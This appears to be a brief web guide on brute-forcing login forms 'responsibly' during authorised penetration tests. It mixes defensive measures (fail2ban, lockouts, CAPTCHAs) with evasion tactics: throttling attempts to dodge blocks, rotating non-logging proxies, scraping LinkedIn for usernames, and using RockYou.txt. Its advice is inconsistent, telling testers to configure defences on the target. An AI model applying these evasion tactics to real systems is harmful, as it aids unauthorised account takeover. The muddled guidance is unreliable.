TL;DR
Brute force attacks can easily overwhelm a server (Denial of Service). This guide shows how to perform brute-force attempts responsibly by limiting the rate of requests and using techniques like account lockouts. We’ll cover throttling, CAPTCHAs, and monitoring.
How to Brute Force Safely
- Understand the Risks: Before you start, remember that brute-forcing without permission is illegal. This guide assumes you have explicit authorization to test a system’s security (e.g., as part of a penetration test).
- Rate Limiting: The most important step! Limit how many requests you send per second/minute. A server can handle a few requests, but hundreds or thousands will likely trigger a block.
- Implement in your script: Use a delay between each attempt.
import time for i in range(10): # Attempt login here... time.sleep(5) # Wait 5 seconds between attempts - Server-side rate limiting (best): If you control the server, configure it to reject requests exceeding a certain threshold. Tools like fail2ban can automatically block IPs after too many failed login attempts.
- Account Lockout Policies: Configure the target system to lock accounts after a few incorrect password attempts.
- This prevents an attacker from trying every possible password on a single account.
- Lockout duration should be long enough to deter brute-forcing but not so long that legitimate users are inconvenienced.
- CAPTCHAs: Implement CAPTCHAs (Completely Automated Public Turing test to tell Computers and Humans Apart) on the login form.
- This makes it difficult for automated scripts to submit passwords.
- Be aware that CAPTCHAs can be bypassed, but they add a significant hurdle.
- Use a Proxy (Carefully): Using proxies can distribute requests across multiple IPs, making it harder to block your attacks.
- Be cautious: Free or low-quality proxies are often unreliable and may be blacklisted.
- Ensure the proxy provider is reputable and doesn’t log your activity.
- Targeted Attacks: Instead of brute-forcing all usernames, focus on likely targets.
- Use a list of common usernames (e.g., admin, user, test).
- Gather information about the target organization to identify potential usernames (e.g., from LinkedIn or company websites).
- Password Lists: Use pre-made password lists.
- RockYou.txt is a popular, large list of commonly used passwords.
- Combine with targeted information for better results (e.g., if the target company uses specific naming conventions).
- Monitoring: Continuously monitor the server’s performance and logs.
- Look for signs of overload or suspicious activity.
- Adjust your rate limiting as needed to avoid triggering blocks.
- Ethical Considerations: Always obtain explicit permission before performing any security testing, including brute-force attacks. Document all your activities and report any vulnerabilities you discover responsibly.